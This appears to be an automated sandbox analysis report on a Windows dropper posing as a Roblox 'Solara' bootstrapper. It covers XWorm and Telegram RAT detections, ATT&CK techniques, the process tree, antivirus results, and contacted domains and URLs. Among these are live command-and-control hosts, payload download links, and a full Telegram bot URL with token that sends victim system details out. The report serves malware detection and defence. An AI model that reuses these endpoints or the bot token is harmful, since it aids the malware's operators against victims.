                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 00000000.00000003.2032035840.000001E9E40E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 8svMXMXNRn.exe PID: 6472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: BootstrapperV21.exe PID: 6524, type: MEMORYSTR
                      Yara detected XWorm
                      Source: Yara matchFile source: 2.0.BootstrapperV21.exe.750000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000003.2032035840.000001E9E40E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.2035345072.0000000000752000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 8svMXMXNRn.exe PID: 6472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: BootstrapperV21.exe PID: 6524, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\explorer.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe, type: DROPPED
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

                      Remote Access Functionality

                      barindex
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 00000000.00000003.2032035840.000001E9E40E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 8svMXMXNRn.exe PID: 6472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: BootstrapperV21.exe PID: 6524, type: MEMORYSTR
                      Yara detected XWorm
                      Source: Yara matchFile source: 2.0.BootstrapperV21.exe.750000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000003.2032035840.000001E9E40E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.2035345072.0000000000752000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 8svMXMXNRn.exe PID: 6472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: BootstrapperV21.exe PID: 6524, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\explorer.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe, type: DROPPED
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information11
                      Scripting                      		Valid Accounts11
                      Windows Management Instrumentation                      		11
                      Scripting                      		1
                      Exploitation for Privilege Escalation                      		11
                      Disable or Modify Tools                      		OS Credential Dumping1
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		2
                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Deobfuscate/Decode Files or Information                      		LSASS Memory3
                      File and Directory Discovery                      		Remote Desktop Protocol1
                      Screen Capture                      		3
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      PowerShell                      		1
                      Scheduled Task/Job                      		11
                      Process Injection                      		2
                      Obfuscated Files or Information                      		Security Account Manager46
                      System Information Discovery                      		SMB/Windows Admin SharesData from Network Shared Drive11
                      Encrypted Channel                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron21
                      Registry Run Keys / Startup Folder                      		1
                      Scheduled Task/Job                      		21
                      Software Packing                      		NTDS1
                      Query Registry                      		Distributed Component Object ModelInput Capture1
                      Non-Standard Port                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchd2
                      Bootkit                      		21
                      Registry Run Keys / Startup Folder                      		1
                      DLL Side-Loading                      		LSA Secrets261
                      Security Software Discovery                      		SSHKeylogging3
                      Non-Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts111
                      Masquerading                      		Cached Domain Credentials1
                      Process Discovery                      		VNCGUI Input Capture14
                      Application Layer Protocol                      		Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                      Modify Registry                      		DCSync151
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
                      Virtualization/Sandbox Evasion                      		Proc Filesystem1
                      Application Window Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                      Process Injection                      		/etc/passwd and /etc/shadow1
                      System Network Configuration Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
                      Bootkit                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532623 Sample: 8svMXMXNRn.exe Startdate: 13/10/2024 Architecture: WINDOWS Score: 100 88 pastebin.com 2->88 90 api.telegram.org 2->90 92 10 other IPs or domains 2->92 108 Multi AV Scanner detection for domain / URL 2->108 110 Suricata IDS alerts for network traffic 2->110 112 Found malware configuration 2->112 118 20 other signatures 2->118 11 8svMXMXNRn.exe 9 2->11         started        14 explorer.exe 2->14         started        17 explorer.exe 2->17         started        19 6 other processes 2->19 signatures3 114 Connects to a pastebin service (likely for C&C) 88->114 116 Uses the Telegram API (likely for C&C communication) 90->116 process4 file5 78 C:\Users\user\AppData\...\BootstrapperV21.exe, PE32 11->78 dropped 80 C:\Users\user\AppData\...\Bootstrapper.exe, PE32+ 11->80 dropped 21 BootstrapperV21.exe 18 193 11->21         started        26 Bootstrapper.exe 14 7 11->26         started        148 Antivirus detection for dropped file 14->148 150 Multi AV Scanner detection for dropped file 14->150 152 Machine Learning detection for dropped file 14->152 signatures6 process7 dnsIp8 98 api.telegram.org 149.154.167.220, 443, 49999 TELEGRAMRU United Kingdom 21->98 100 cash-hispanic.gl.at.ply.gg 147.185.221.23, 1764, 50002, 50003 SALSGIVERUS United States 21->100 72 C:\Users\user\AppData\Roaming\explorer.exe, PE32 21->72 dropped 74 C:\Users\user\AppData\Local\Temp\voosiq.exe, PE32+ 21->74 dropped 120 Antivirus detection for dropped file 21->120 122 Multi AV Scanner detection for dropped file 21->122 124 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 21->124 128 5 other signatures 21->128 28 voosiq.exe 21->28         started        32 powershell.exe 21->32         started        34 powershell.exe 21->34         started        41 4 other processes 21->41 102 pastebin.com 172.67.19.24, 443, 49706 CLOUDFLARENETUS United States 26->102 104 127.0.0.1 unknown unknown 26->104 106 2 other IPs or domains 26->106 76 C:\Users\user\...\BootstrapperV1.22.exe, PE32+ 26->76 dropped 126 Machine Learning detection for dropped file 26->126 36 BootstrapperV1.22.exe 26->36         started        39 conhost.exe 26->39         started        file9 signatures10 process11 dnsIp12 82 C:\Users\user\AppData\Local\...\TrojanXD.exe, PE32 28->82 dropped 84 C:\Users\user\AppData\Local\Temp\script.vbs, Unicode 28->84 dropped 142 Multi AV Scanner detection for dropped file 28->142 43 TrojanXD.exe 28->43         started        46 wscript.exe 28->46         started        144 Loading BitLocker PowerShell Module 32->144 48 conhost.exe 32->48         started        50 conhost.exe 34->50         started        94 edge-term4-fra4.roblox.com 128.116.44.3, 443, 49711 ROBLOX-PRODUCTIONUS United States 36->94 96 www.nodejs.org 104.20.23.46, 443, 49712 CLOUDFLARENETUS United States 36->96 86 \Device\ConDrv, ISO-8859 36->86 dropped 146 Machine Learning detection for dropped file 36->146 52 cmd.exe 36->52         started        54 conhost.exe 36->54         started        56 WerFault.exe 36->56         started        58 conhost.exe 41->58         started        60 2 other processes 41->60 file13 signatures14 process15 signatures16 130 Antivirus detection for dropped file 43->130 132 Multi AV Scanner detection for dropped file 43->132 134 Protects its processes via BreakOnTermination flag 43->134 140 3 other signatures 43->140 62 cmd.exe 43->62         started        136 Windows Scripting host queries suspicious COM object (likely to drop second stage) 46->136 138 Uses ipconfig to lookup or modify the Windows network settings 52->138 64 conhost.exe 52->64         started        66 ipconfig.exe 52->66         started        process17 process18 68 conhost.exe 62->68         started        70 reg.exe 62->70         started       

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      8svMXMXNRn.exe66%ReversingLabsWin64.Adware.Multiverze
                      8svMXMXNRn.exe77%VirustotalBrowse
                      8svMXMXNRn.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\Bootstrapper.exe100%AviraTR/Agent_AGen.ftans
                      C:\Users\user\AppData\Local\Temp\TrojanXD.exe100%AviraHEUR/AGEN.1305458
                      C:\Users\user\AppData\Roaming\explorer.exe100%AviraTR/Spy.Gen
                      C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe100%AviraTR/Spy.Gen
                      C:\Users\user\AppData\Local\Temp\Bootstrapper.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\TrojanXD.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\explorer.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\Bootstrapper.exe63%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe63%ReversingLabsWin64.Trojan.Malgent
                      C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe88%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
                      C:\Users\user\AppData\Local\Temp\TrojanXD.exe79%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                      C:\Users\user\AppData\Local\Temp\voosiq.exe58%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                      C:\Users\user\AppData\Roaming\explorer.exe88%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      SourceDetectionScannerLabelLink
                      edge-term4-fra4.roblox.com0%VirustotalBrowse
                      nodejs.org0%VirustotalBrowse
                      cash-hispanic.gl.at.ply.gg5%VirustotalBrowse
                      getsolara.dev14%VirustotalBrowse
                      79c62fd6.solaraweb-alj.pages.dev7%VirustotalBrowse
                      www.nodejs.org0%VirustotalBrowse
                      api.telegram.org2%VirustotalBrowse
                      clientsettings.roblox.com0%VirustotalBrowse
                      settings-ssl.xboxlive.com0%VirustotalBrowse
                      pastebin.com0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://crl.microsoft0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://g.live.com/odclientsettings/ProdV2.C:0%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://nuget.org/nuget.exe0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      http://nuget.org/NuGet.exe0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      http://james.newtonking.com/projects/json0%URL Reputationsafe
                      http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                      https://www.newtonsoft.com/jsonschema0%URL Reputationsafe
                      https://www.nuget.org/packages/Newtonsoft.Json.Bson0%URL Reputationsafe
                      https://aka.ms/pscore680%URL Reputationsafe
                      http://127.0.0.1:64631%VirustotalBrowse
                      http://www.nodejs.org0%VirustotalBrowse
                      https://79c62fd6.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe7%VirustotalBrowse
                      https://api.telegram.org/bot4%VirustotalBrowse
                      https://79c62fd6.solaraweb-alj.pages.dev8%VirustotalBrowse
                      https://go.microsoft.co1%VirustotalBrowse
                      https://www.nodejs.org0%VirustotalBrowse
                      https://aka.ms/vs/17/release/vc_redist.x64.exe0%VirustotalBrowse
                      http://79c62fd6.solaraweb-alj.pages.dev7%VirustotalBrowse
                      https://ncs.roblox.com/upload0%VirustotalBrowse
                      https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi0%VirustotalBrowse
                      https://pastebin.com/raw/ZESVzSgK1%VirustotalBrowse
                      https://getsolara.dev/api/endpoint.jsonChttps://pastebin.com/raw/ZESVzSgK10%VirustotalBrowse
                      https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/raw0%VirustotalBrowse
                      https://gist.githubusercontent.com/typeshi12/29ef3a44a19235b08aaf229631c024d8/raw0%VirustotalBrowse
                      http://127.0.0.1:6463/rpc?v=10%VirustotalBrowse
                      127.0.0.11%VirustotalBrowse
                      https://nodejs.org0%VirustotalBrowse
                      http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                      https://getsolara.dev/asset/discord.json9%VirustotalBrowse
                      https://github.com/Pester/Pester1%VirustotalBrowse
                      https://discord.com0%VirustotalBrowse
                      http://edge-term4-fra4.roblox.com0%VirustotalBrowse
                      http://getsolara.dev14%VirustotalBrowse
                      https://g.live.com/odclientsettings/Prod/C:0%VirustotalBrowse
                      cash-hispanic.gl.at.ply.gg5%VirustotalBrowse
                      https://getsolara.dev14%VirustotalBrowse
                      https://getsolara.dev/api/endpoint.json11%VirustotalBrowse
                      http://127.0.0.1:646320%VirustotalBrowse
                      https://79c62fd6.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip7%VirustotalBrowse
                      http://nodejs.org0%VirustotalBrowse
                      http://pastebin.com0%VirustotalBrowse
                      https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live0%VirustotalBrowse

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      edge-term4-fra4.roblox.com
                      		128.116.44.3
                      		truefalseunknown
                      cash-hispanic.gl.at.ply.gg
                      		147.185.221.23
                      		truetrueunknown
                      nodejs.org
                      		104.20.22.46
                      		truefalseunknown
                      getsolara.dev
                      		104.21.93.27
                      		truefalseunknown
                      79c62fd6.solaraweb-alj.pages.dev
                      		172.66.44.59
                      		truefalseunknown
                      www.nodejs.org
                      		104.20.23.46
                      		truefalseunknown
                      api.telegram.org
                      		149.154.167.220
                      		truetrueunknown
                      pastebin.com
                      		172.67.19.24
                      		truetrueunknown
                      clientsettings.roblox.com
                      		unknown
                      		unknowntrueunknown
                      settings-ssl.xboxlive.com
                      		unknown
                      		unknowntrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://79c62fd6.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exefalseunknown
                      https://api.telegram.org/bot8013268995:AAHt5-BJsAIEM9hnoTy17y1WYC4NnCMU398/sendMessage?chat_id=5405936031&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A58ABE3825259C230781C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%208TH9_M1_S%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2true
                        		unknown
                        https://pastebin.com/raw/ZESVzSgKfalseunknown
                        https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msifalseunknown
                        127.0.0.1trueunknown
                        https://getsolara.dev/asset/discord.jsonfalseunknown
                        cash-hispanic.gl.at.ply.ggtrueunknown
                        https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/livefalseunknown
                        https://getsolara.dev/api/endpoint.jsonfalseunknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:6463Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF4AB000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        http://www.nodejs.orgBootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://79c62fd6.solaraweb-alj.pages.devBootstrapper.exe, 00000003.00000002.2134494144.00000247BF54D000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://api.telegram.org/bot8svMXMXNRn.exe, 00000000.00000003.2032035840.000001E9E40E4000.00000004.00000020.00020000.00000000.sdmp, BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV21.exe, 00000002.00000000.2035345072.0000000000752000.00000002.00000001.01000000.00000009.sdmptrueunknown
                        https://go.microsoft.copowershell.exe, 00000005.00000002.2122316030.000001D47DCB8000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        http://crl.microsoftpowershell.exe, 00000016.00000002.2441193901.00000201AB184000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Licensepowershell.exe, 00000016.00000002.2617353264.00000201BCB74000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://ncs.roblox.com/uploadBootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6C0000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E669000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://www.nodejs.orgBootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 0000001F.00000003.3606100140.00000146356B0000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/rawBootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E64E000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://aka.ms/vs/17/release/vc_redist.x64.exe8svMXMXNRn.exe, 00000000.00000003.2032035840.000001E9E40E4000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000003.00000000.2035830040.00000247BD6F2000.00000002.00000001.01000000.0000000A.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000000.2128272652.000001AC8C7A2000.00000002.00000001.01000000.0000000E.sdmpfalseunknown
                        http://79c62fd6.solaraweb-alj.pages.devBootstrapper.exe, 00000003.00000002.2134494144.00000247BF54D000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://contoso.com/powershell.exe, 00000016.00000002.2617353264.00000201BCB74000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.2118096671.000001D4759B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2239684781.0000020035F95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2379557085.000001DA74C95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2617353264.00000201BCB74000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://getsolara.dev/api/endpoint.jsonChttps://pastebin.com/raw/ZESVzSgK8svMXMXNRn.exe, 00000000.00000003.2032035840.000001E9E40E4000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000003.00000000.2035830040.00000247BD6F2000.00000002.00000001.01000000.0000000A.sdmpfalseunknown
                        https://gist.githubusercontent.com/typeshi12/29ef3a44a19235b08aaf229631c024d8/rawBootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E551000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000000.2128272652.000001AC8C7A2000.00000002.00000001.01000000.0000000E.sdmpfalseunknown
                        http://crl.micft.cMicRosofpowershell.exe, 00000005.00000002.2130997273.000001D47DF81000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://www.microsoft.cpowershell.exe, 0000000D.00000002.2253701366.000002003E734000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://127.0.0.1:6463/rpc?v=1Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF4AB000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF3B1000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E551000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameBootstrapperV21.exe, 00000002.00000002.4509858582.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF43D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2102713604.000001D465941000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E5E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2167165138.0000020025F21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2290083728.000001DA64C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2442020848.00000201ACB01000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://nodejs.orgBootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.2118096671.000001D4759B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2239684781.0000020035F95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2379557085.000001DA74C95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2617353264.00000201BCB74000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://discord.comBootstrapper.exe, 00000003.00000002.2134494144.00000247BF3B1000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E551000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            https://synapsexdocs.github.io/custom-lua-functions/console-functions/)BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E622000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6C4000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6D6000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000016.00000002.2442020848.00000201ACD28000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000005.00000002.2102713604.000001D465B69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2167165138.0000020026149000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2290083728.000001DA64E48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2442020848.00000201ACD28000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000016.00000002.2442020848.00000201ACD28000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                              http://crl.micpowershell.exe, 00000005.00000002.2130997273.000001D47DF81000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://contoso.com/Iconpowershell.exe, 00000016.00000002.2617353264.00000201BCB74000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://crl.ver)svchost.exe, 0000001F.00000002.4500802078.0000014635800000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000016.00000002.2442020848.00000201ACD28000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                  http://james.newtonking.com/projects/jsonBootstrapperV1.22.exe, 00000008.00000000.2128272652.000001AC8C7A2000.00000002.00000001.01000000.0000000E.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://edge-term4-fra4.roblox.comBootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E6E6000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                  http://getsolara.devBootstrapper.exe, 00000003.00000002.2134494144.00000247BF521000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF458000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E604000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                  https://discord.com;http://127.0.0.1:6463/rpc?v=118svMXMXNRn.exe, 00000000.00000003.2032035840.000001E9E40E4000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000003.00000000.2035830040.00000247BD6F2000.00000002.00000001.01000000.0000000A.sdmp, BootstrapperV1.22.exe, 00000008.00000000.2128272652.000001AC8C7A2000.00000002.00000001.01000000.0000000E.sdmpfalse
                                    		unknown
                                    https://g.live.com/odclientsettings/Prod/C:svchost.exe, 0000001F.00000003.3606100140.0000014635723000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                    https://getsolara.devBootstrapper.exe, 00000003.00000002.2134494144.00000247BF44E000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF521000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF43D000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E64E000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E5E4000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.22.exe, 00000008.00000002.2521727635.000001AC8E5FA000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                    http://127.0.0.1:64632Bootstrapper.exe, 00000003.00000002.2134494144.00000247BF4AB000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000005.00000002.2102713604.000001D465B69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2167165138.0000020026149000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2290083728.000001DA64E48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2442020848.00000201ACD28000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.newtonsoft.com/jsonschemaBootstrapperV1.22.exe, 00000008.00000000.2128272652.000001AC8C7A2000.00000002.00000001.01000000.0000000E.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
